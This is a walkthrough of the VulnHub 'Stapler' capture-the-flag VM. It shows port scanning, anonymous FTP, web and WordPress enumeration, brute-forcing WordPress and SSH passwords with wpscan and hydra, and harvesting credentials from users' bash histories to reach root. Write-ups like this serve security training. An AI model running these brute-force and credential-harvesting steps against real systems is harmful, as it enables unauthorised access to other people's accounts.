Stapler
He110 w0rld! Today i will be sharing a guide to completing the Stapler VM hosted on VulnHub. This VM was created by the one and only @
g0tmi1k.
As always there will be spoilers within this guide so use as little or as much as you need.
***With all these VMs there are always multiple ways to r00t the box***
+---------------------------------------------------------+
| |
| __..--''\ |
| __..--'' \ |
| __..--'' __..--'' |
| __..--'' __..--'' | |
| \ o __..--''____....----"" |
| \__..--''\ |
| | \ |
| +----------------------------------+ |
| +----------------------------------+ |
| |
+- - - - - - - - - - - - - -|- - - - - - - - - - - - - - -+
| Name: Stapler | IP: DHCP |
| Date: 2016-June-08 | Goal: Get Root! |
| Author: g0tmi1k | Difficultly: ??? ;) |
+- - - - - - - - - - - - - -|- - - - - - - - - - - - - - -+
| |
| + Average beginner/intermediate VM, only a few twists |
| + May find it easy/hard (depends on YOUR background) |
| + ...also which way you attack the box |
| |
| + It SHOULD work on both VMware and Virtualbox |
| + REBOOT the VM if you CHANGE network modes |
| + Fusion users, you'll need to retry when importing |
| |
| + There are multiple methods to-do this machine |
| + At least two (2) paths to get a limited shell |
| + At least three (3) ways to get a root access |
| |
| + Made for BsidesLondon 2016 |
| + Slides: https://download.vulnhub.com/media/stapler/ |
| |
| + Thanks g0tmi1k, nullmode, rasta_mouse & superkojiman |
| + ...and shout-outs to the VulnHub-CTF Team =) |
| |
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - -+
| |
| --[[~~Enjoy. Have fun. Happy Hacking.~~]]-- |
| |
+---------------------------------------------------------+
Lets reap some bytes...
Discovery
Command: netdiscover -r 192.168.153.0/24
***Please note your IP Range can/will differ***
0 | Currently scanning: 192.168.153.0/24 | Screen View: Unique Hosts |
1 | 3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180 |
2 | _____________________________________________________________________________ |
3 | IP At MAC Address Count Len MAC Vendor / Hostname |
4 | ----------------------------------------------------------------------------- |
5 | 192.168.153.1 00:50:56:c0:00:01 1 60 VMware, Inc. |
6 | 192.168.153.142 00:0c:29:8b:3c:14 1 60 VMware, Inc. |
7 | 192.168.153.254 00:50:56:f8:e3:7b 1 60 VMware, Inc. |
Enumeration
Command: nmap -sS -Pn -p1-65535 192.168.153.1420 | root@lulb0x:~# nmap -sS -Pn -p1-65535 192.168.153.142 |
1 | Starting Nmap 7.12 ( https://nmap.org ) at 2016-06-24 15:26 EDT |
2 | Nmap scan report for Red.Initech (192.168.153.142) |
3 | Host is up (0.00023s latency). |
4 | Not shown: 65523 filtered ports |
5 | PORT STATE SERVICE |
6 | 20/tcp closed ftp-data |
7 | 21/tcp open ftp |
8 | 22/tcp open ssh |
9 | 53/tcp open domain |
10 | 80/tcp open http |
11 | 123/tcp closed ntp |
12 | 137/tcp closed netbios-ns |
13 | 138/tcp closed netbios-dgm |
14 | 139/tcp open netbios-ssn |
15 | 666/tcp open doom |
16 | 3306/tcp open mysql |
17 | 12380/tcp open unknown |
18 | MAC Address: 00:0C:29:8B:3C:14 (VMware) |
Service Exploration
FTP
0 | root@lulb0x:~# ftp 192.168.153.142 |
1 | Connected to 192.168.153.142. |
2 | 220- |
3 | 220-|-----------------------------------------------------------------------------------------| |
4 | 220-| Harry, make sure to update the banner when you get a chance to show who has access here | |
5 | 220-|-----------------------------------------------------------------------------------------| |
6 | 220- |
7 | 220 |
8 | Name (192.168.153.142:root): Anonymous |
9 | 331 Please specify the password. |
10 | Password: |
11 | 230 Login successful. |
12 | Remote system type is UNIX. |
13 | Using binary mode to transfer files. |
14 | ftp> ls |
15 | 200 PORT command successful. Consider using PASV. |
16 | 150 Here comes the directory listing. |
17 | -rw-r--r-- 1 0 0 107 Jun 03 23:06 note |
18 | 226 Directory send OK. |
19 | ftp> get note |
20 | local: note remote: note |
21 | 200 PORT command successful. Consider using PASV. |
22 | 150 Opening BINARY mode data connection for note (107 bytes). |
23 | 226 Transfer complete. |
24 | 107 bytes received in 0.00 secs (50.0442 kB/s) |
25 | ftp> exit |
Interesting a potential user Harry i will add this to the list of potential users. Reading our loot (note) reveals...
0 | root@lulb0x:~# cat note |
1 | Elly, make sure you update the payload information. Leave it in your FTP account once your are done, John. |
SSH
Usually there is nothing to gain from trying to SSH at this point but i always connect just to see if the banner (assuming there is one) has any hints that we can put away for a later time.0 | root@lulb0x:~# ssh 192.168.153.142 |
1 | ----------------------------------------------------------------- |
2 | ~ Barry, don't forget to put a message here ~ |
3 | ----------------------------------------------------------------- |
4 | root@192.168.153.142's password: |
666 - The port of the beast!!!
0 | root@lulb0x:~# nc 192.168.153.142 666 |
1 | PK d��Hp� ��, 2 |
2 | message2.jpgUT +�QWJ�QWux |
3 | � �z |
4 | T ���P���A@� �UT�T � 2>��RDK �Jj�"DL[E� |
5 | 0<Ĵ�ʮn���V �W�H � |
Command: nc 192.168.153.142 666 > SatanicFile
0 | root@lulb0x:~/Documents/Stapler/Satans_Port# file Satanic_File |
1 | Satanic_File: Zip archive data, at least v2.0 to extract |
Command: Unzip Satanic_File
0 | root@lulb0x:~/Documents/Stapler/Satans_Port# unzip Satanic_File.zip |
1 | Archive: Satanic_File.zip |
2 | inflating: message2.jpg |
Great yet another potential user: scott
Now, i have been burned a couple times in these VMs by not checking out the jpgs for hidden messages. So i always run strings on the images.
Command: strings message2.jpg
0 | JFIF |
1 | vPhotoshop 3.0 |
2 | 8BIM |
3 | 1If you are reading this, you should get a cookie! |
Port 12380
Trying to figure out what port 12380 contains with netcat was pretty simple.Interesting a webpage with 3 more peoples names:
dave
tim
zoe
Port 80 /12380 : Http(s?)
Since we know that 12380 turned out to be a website we can now run nikto and dirb/dirbuster against them.
Command: nikto -host 192.168.153.142; dirb http://192.168.153.142
0 | root@lulb0x:~/Documents/Stapler# nikto -host 192.168.153.142; dirb http://192.168.153.142 |
1 | - Nikto v2.1.6 |
2 | --------------------------------------------------------------------------- |
3 | + Target IP: 192.168.153.142 |
4 | + Target Hostname: 192.168.153.142 |
5 | + Target Port: 80 |
6 | + Start Time: 2016-06-27 10:56:46 (GMT-4) |
7 | --------------------------------------------------------------------------- |
8 | + Server: No banner retrieved |
9 | + The anti-clickjacking X-Frame-Options header is not present. |
10 | + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS |
11 | + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type |
12 | + No CGI Directories found (use '-C all' to force check all possible dirs) |
13 | + OSVDB-3093: /.bashrc: User home dir was found with a shell rc file. This may reveal file and path information. |
14 | + OSVDB-3093: /.profile: User home dir with a shell profile was found. May reveal directory information and system configuration. |
15 | + ERROR: Error limit (20) reached for host, giving up. Last error: error reading HTTP response |
16 | + Scan terminated: 20 error(s) and 5 item(s) reported on remote host |
17 | + End Time: 2016-06-27 10:56:58 (GMT-4) (12 seconds) |
18 | --------------------------------------------------------------------------- |
19 | + 1 host(s) tested |
20 | ----------------- |
21 | DIRB v2.22 |
22 | By The Dark Raver |
23 | ----------------- |
24 | START_TIME: Mon Jun 27 10:56:58 2016 |
25 | URL_BASE: http://192.168.153.142/ |
26 | WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt |
27 | ----------------- |
28 | GENERATED WORDS: 4612 |
29 | ---- Scanning URL: http://192.168.153.142/ ---- |
30 | + http://192.168.153.142/.bashrc (CODE:200|SIZE:3771) |
31 | + http://192.168.153.142/.profile (CODE:200|SIZE:675) |
32 | ----------------- |
33 | END_TIME: Mon Jun 27 10:57:02 2016 |
34 | DOWNLOADED: 4612 - FOUND: 2 |
Looking quickly i didn't find anything of earth-shattering awesome sauce so i moved on to 12380 Command: nikto -host 192.168.153.142 -port 12380;
0 | root@lulb0x:~/Documents/Stapler# nikto -host 192.168.153.142 -port 12380; |
1 | - Nikto v2.1.6 |
2 | --------------------------------------------------------------------------- |
3 | + Target IP: 192.168.153.142 |
4 | + Target Hostname: 192.168.153.142 |
5 | + Target Port: 12380 |
6 | --------------------------------------------------------------------------- |
7 | + SSL Info: Subject: /C=UK/ST=Somewhere in the middle of nowhere/L=Really, what are you meant to put here? /O=Initech/OU=Pam: I give up. no idea what to put here./CN=Red.Initech/emailAddress=pam@red.localhost |
8 | Ciphers: ECDHE-RSA-AES256-GCM-SHA384 |
9 | Issuer: /C=UK/ST=Somewhere in the middle of nowhere/L=Really, what are you meant to put here? /O=Initech/OU=Pam: I give up. no idea what to put here./CN=Red.Initech/emailAddress=pam@red.localhost |
10 | + Start Time: 2016-06-27 11:01:00 (GMT-4) |
11 | --------------------------------------------------------------------------- |
12 | + Server: Apache/2.4.18 (Ubuntu) |
13 | + Server leaks inodes via ETags, header found with file /, fields: 0x15 0x5347c53a972d1 |
14 | + The anti-clickjacking X-Frame-Options header is not present. |
15 | + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS |
16 | + Uncommon header 'dave' found, with contents: Soemthing doesn't look right here |
17 | + The site uses SSL and the Strict-Transport-Security HTTP header is not defined. |
18 | + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type |
19 | + No CGI Directories found (use '-C all' to force check all possible dirs) |
20 | + Entry '/admin112233/' in robots.txt returned a non-forbidden or redirect HTTP code (200) |
21 | + Entry '/blogblog/' in robots.txt returned a non-forbidden or redirect HTTP code (200) |
22 | + "robots.txt" contains 2 entries which should be manually viewed. |
23 | + Hostname '192.168.153.142' does not match certificate's names: Red.Initech |
24 | + Allowed HTTP Methods: GET, HEAD, POST, OPTIONS |
25 | + Uncommon header 'x-ob_mode' found, with contents: 1 |
26 | + OSVDB-3233: /icons/README: Apache default file found. |
27 | + /phpmyadmin/: phpMyAdmin directory found |
28 | + 7690 requests: 0 error(s) and 14 item(s) reported on remote host |
29 | + End Time: 2016-06-27 11:02:40 (GMT-4) (100 seconds) |
So we are getting a ssl cert and we get another user: pam.
Also, we get 2 folders from the robots.txt file:
admin112233
blogblog (potentially a cms) nice.
Navigating to https://192.168.153.142:12380/admin112233 gives us the following (did you get caught :) )
Moving on...
blogblog reveals itself as a WordPress site. Sweet. If we get a credential, hopefully we can edit a theme and drop a rev shell or RCE.
For this next part i am going to use wpscan to find everything of value (If you are looking for another awesome tutorial, a video one, check out https://7ms.us Brian does a great job of explaining what flags to use for wpscan. Thanks Brian @7minsec)
Command: wpscan --url https://192.168.153.142:12380/blogblog/ -e u[1-20] -e a
0 | _______________________________________________________________ |
1 | __ _______ _____ |
2 | \ \ / / __ \ / ____| |
3 | \ \ /\ / /| |__) | (___ ___ __ _ _ __ |
4 | \ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \ |
5 | \ /\ / | | ____) | (__| (_| | | | | |
6 | \/ \/ |_| |_____/ \___|\__,_|_| |_| |
7 | WordPress Security Scanner by the WPScan Team |
8 | Version 2.9.1 |
9 | Sponsored by Sucuri - https://sucuri.net |
10 | @_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_ |
11 | _______________________________________________________________ |
12 | [+] URL: https://192.168.153.142:12380/blogblog/ |
13 | [+] Started: Mon Jun 27 11:17:31 2016 |
14 | [!] The WordPress 'https://192.168.153.142:12380/blogblog/readme.html' file exists exposing a version number |
15 | [+] Interesting header: DAVE: Soemthing doesn't look right here |
16 | [+] Interesting header: SERVER: Apache/2.4.18 (Ubuntu) |
17 | [!] Registration is enabled: https://192.168.153.142:12380/blogblog/wp-login.php?action=register |
18 | [+] XML-RPC Interface available under: https://192.168.153.142:12380/blogblog/xmlrpc.php |
19 | [!] Upload directory has directory listing enabled: https://192.168.153.142:12380/blogblog/wp-content/uploads/ |
20 | [!] Includes directory has directory listing enabled: https://192.168.153.142:12380/blogblog/wp-includes/ |
21 | [+] WordPress version 4.2.1 identified from advanced fingerprinting (Released on 2015-04-27) |
22 | [!] 21 vulnerabilities identified from the version number |
0 | [+] Enumerating usernames ... |
1 | [+] Identified the following 16 user/s: |
2 | +----+---------+-----------------+ |
3 | | Id | Login | Name | |
4 | +----+---------+-----------------+ |
5 | | 1 | john | John Smith | |
6 | | 2 | elly | Elly Jones | |
7 | | 3 | peter | Peter Parker | |
8 | | 4 | barry | Barry Atkins | |
9 | | 5 | heather | Heather Neville | |
10 | | 6 | garry | garry | |
11 | | 7 | harry | harry | |
12 | | 8 | scott | scott | |
13 | | 9 | kathy | kathy | |
14 | | 10 | tim | tim | |
15 | | 11 | zoe | ZOE | |
16 | | 12 | dave | Dave | |
17 | | 13 | simon | Simon | |
18 | | 14 | abby | Abby | |
19 | | 15 | vicki | Vicki | |
20 | | 16 | pam | Pam | |
21 | +----+---------+-----------------+ |
pam
dave
zoe
tim
garry
harry
barry
peter
john
elly
I remember seeing a message for elly stating that there was a payload waiting for her in her ftp account... or something like that. lets see if wpscan can brute her password.
Command: wpscan --url https://192.168.153.142:12380/blogblog/ --wordlist /usr/share/wordlists/rockyou_5max.txt --username elly
****NOTE: rockyou_5max.txt is just the rockyou list but only the words that are 5 chars or less****
****NOTE v2.0: I created a bruteforcer in python for finding the password also, as a codemonkey i feel the need to always try on my own. If anyone wants it feel free to leave a comment and i can share with you****
0 | [+] Enumerating plugins from passive detection ... |
1 | [+] No plugins found |
2 | [+] Starting the password brute forcer |
3 | [+] [SUCCESS] Login : elly Password : ylle |
4 | Brute Forcing 'elly' Time: 00:18:01 |
5 | +----+-------+------+----------+ |
6 | | Id | Login | Name | Password | |
7 | +----+-------+------+----------+ |
8 | | | elly | | ylle | |
9 | +----+-------+------+----------+ |
10 | [+] Finished: Mon Jun 27 11:46:55 2016 |
11 | [+] Requests Done: 99717 |
12 | [+] Memory used: 42.395 MB |
13 | [+] Elapsed time: 00:18:04 |
Ooh... elly was cracked with the password of ylle.
Lets switch back and try her credentials on the ftp service and see if we get lucky with some password reuse.
0 | root@lulb0x:~/Documents/Stapler# ftp 192.168.153.142 |
1 | Connected to 192.168.153.142. |
2 | 220- |
3 | 220-|-----------------------------------------------------------------------------------------| |
4 | 220-| Harry, make sure to update the banner when you get a chance to show who has access here | |
5 | 220-|-----------------------------------------------------------------------------------------| |
6 | 220- |
7 | 220 |
8 | Name (192.168.153.142:root): elly |
9 | 331 Please specify the password. |
10 | Password: |
11 | 230 Login successful. |
12 | Remote system type is UNIX. |
13 | Using binary mode to transfer files. |
Bingo... but what can we see
Command: ls
0 | ftp> ls |
1 | 200 PORT command successful. Consider using PASV. |
2 | 150 Here comes the directory listing. |
3 | drwxr-xr-x 5 0 0 4096 Jun 03 13:51 X11 |
4 | drwxr-xr-x 3 0 0 4096 Jun 03 13:51 acpi |
5 | -rw-r--r-- 1 0 0 3028 Apr 20 23:09 adduser.conf |
6 | -rw-r--r-- 1 0 0 51 Jun 03 19:20 aliases |
7 | -rw-r--r-- 1 0 0 12288 Jun 03 19:20 aliases.db |
8 | drwxr-xr-x 2 0 0 4096 Jun 07 01:57 alternatives |
9 | drwxr-xr-x 8 0 0 4096 Jun 03 17:46 apache2 |
10 | drwxr-xr-x 3 0 0 4096 Jun 03 13:51 apparmor |
11 | drwxr-xr-x 9 0 0 4096 Jun 06 23:17 apparmor.d |
12 | drwxr-xr-x 3 0 0 4096 Jun 03 13:51 apport |
13 | drwxr-xr-x 6 0 0 4096 Jun 03 14:05 apt |
14 | -rw-r----- 1 0 1 144 Jan 14 23:35 at.deny |
15 | drwxr-xr-x 5 0 0 4096 Jun 03 14:47 authbind |
16 | -rw-r--r-- 1 0 0 2188 Sep 01 2015 bash.bashrc |
17 | drwxr-xr-x 2 0 0 4096 Jun 03 13:52 bash_completion.d |
18 | -rw-r--r-- 1 0 0 367 Jan 27 15:17 bindresvport.blacklist |
19 | drwxr-xr-x 2 0 0 4096 Apr 12 11:30 binfmt.d |
20 | drwxr-xr-x 2 0 0 4096 Jun 03 13:51 byobu |
21 | drwxr-xr-x 3 0 0 4096 Jun 03 13:51 ca-certificates |
22 | -rw-r--r-- 1 0 0 7788 Jun 03 13:51 ca-certificates.conf |
23 | drwxr-xr-x 2 0 0 4096 Jun 03 13:49 console-setup |
24 | drwxr-xr-x 2 0 0 4096 Jun 03 19:13 cron.d |
25 | drwxr-xr-x 2 0 0 4096 Jun 03 17:07 cron.daily |
26 | drwxr-xr-x 2 0 0 4096 Jun 03 13:49 cron.hourly |
27 | drwxr-xr-x 2 0 0 4096 Jun 03 13:49 cron.monthly |
28 | drwxr-xr-x 2 0 0 4096 Jun 03 13:51 cron.weekly |
29 | -rw-r--r-- 1 0 0 722 Apr 05 22:59 crontab |
30 | -rw-r--r-- 1 0 0 54 Jun 03 13:51 crypttab |
31 | drwxr-xr-x 2 0 0 4096 Jun 04 00:02 dbconfig-common |
32 | drwxr-xr-x 4 0 0 4096 Jun 03 13:51 dbus-1 |
33 | -rw-r--r-- 1 0 0 2969 Nov 10 2015 debconf.conf |
34 | -rw-r--r-- 1 0 0 12 Apr 30 2015 debian_version |
35 | drwxr-xr-x 3 0 0 4096 Jun 05 23:04 default |
36 | -rw-r--r-- 1 0 0 604 Jul 02 2015 deluser.conf |
37 | drwxr-xr-x 2 0 0 4096 Jun 03 13:49 depmod.d |
38 | drwxr-xr-x 4 0 0 4096 Jun 03 13:49 dhcp |
39 | -rw-r--r-- 1 0 0 26716 Jul 30 2015 dnsmasq.conf |
40 | drwxr-xr-x 2 0 0 4096 Jun 03 14:19 dnsmasq.d |
41 | drwxr-xr-x 4 0 0 4096 Jun 07 01:57 dpkg |
42 | -rw-r--r-- 1 0 0 96 Apr 20 23:09 environment |
43 | drwxr-xr-x 4 0 0 4096 Jun 03 14:18 fonts |
44 | -rw-r--r-- 1 0 0 594 Jun 03 13:49 fstab |
/etc = lulz lets grab the passwd file and see if any of our potential users are actual users
Command: get passwd
0 | ftp> get passwd |
1 | local: passwd remote: passwd |
2 | 200 PORT command successful. Consider using PASV. |
3 | 150 Opening BINARY mode data connection for passwd (2908 bytes). |
4 | 226 Transfer complete. |
5 | 2908 bytes received in 0.00 secs (6.6826 MB/s) |
0 | RNunemaker |
1 | ETollefson |
2 | DSwanger |
3 | AParnell |
4 | SHayslett |
5 | MBassin |
6 | JBare |
7 | LSolum |
8 | MFrei |
9 | SStroud |
10 | JKanode |
11 | CJoo |
12 | Drew |
13 | jess |
14 | SHAY |
15 | mel |
16 | zoe |
17 | NATHAN |
18 | elly |
Okay time to let hydra do what it does best. Command: hydra -L Actual_Users -P /usr/share/john/password.lst ssh://192.168.153.142 -t 15 -u
0 | root@lulb0x:~/Documents/Stapler# hydra -L Actual_Users -P /usr/share/wordlists/rockyou.txt ssh://192.168.153.142 -t 15 -u |
1 | Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes. |
2 | Hydra (http://www.thc.org/thc-hydra) starting at 2016-06-27 13:19:14 |
3 | [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4 |
4 | [WARNING] Restorefile (./hydra.restore) from a previous session found, to prevent overwriting, you have 10 seconds to abort... |
5 | [DATA] max 15 tasks per 1 server, overall 64 tasks, 272543581 login tries (l:19/p:14344399), ~283899 tries per task |
6 | [DATA] attacking service ssh on port 22 |
7 | [STATUS] 162.00 tries/min, 162 tries in 00:01h, 272543419 todo in 28039:27h, 15 active |
8 | [22][ssh] host: 192.168.153.142 login: Drew password: qwerty |
9 | [STATUS] 203.67 tries/min, 611 tries in 00:03h, 272542970 todo in 22303:02h, 15 active |
10 | [22][ssh] host: 192.168.153.142 login: JBare password: cookie |
Trying to cut some corners, since it seems that all the home folders are public readable....
Command: cat */.bash_history
0 | JBare@red:/home$ cat */.bash_history |
1 | exit |
2 | free |
3 | exit |
4 | exit |
5 | exit |
6 | exit |
7 | exit |
8 | exit |
9 | exit |
10 | exit |
11 | top |
12 | ps aux |
13 | exit |
14 | exit |
15 | exit |
16 | id |
17 | whoami |
18 | ls -lah |
19 | pwd |
20 | ps aux |
21 | sshpass -p thisimypassword ssh JKanode@localhost |
22 | apt-get install sshpass |
23 | sshpass -p JZQuyIN5 peter@localhost |
24 | ps -ef |
25 | top |
26 | kill -9 3747 |
27 | exit |
28 | exit |
29 | exit |
30 | exit |
31 | exit |
32 | whoami |
33 | exit |
34 | exit |
35 | exit |
36 | exit |
37 | exit |
38 | cat: peter/.bash_history: Permission denied |
39 | exit |
40 | exit |
41 | exit |
42 | exit |
43 | exit |
44 | exit |
45 | id |
46 | top |
47 | exit |
JKanode:thisismypassword
peter:JZQuyIN5
I am going to try peters credentials first because he has a stronger password...i would like to believe he is a sudoer at a minimum.
Jackpot...peter has full root access with a sudo su we get root and claim our flag
I would like to thank G0tMi1k and Vulnhub and all the testers. This was a very fun VM.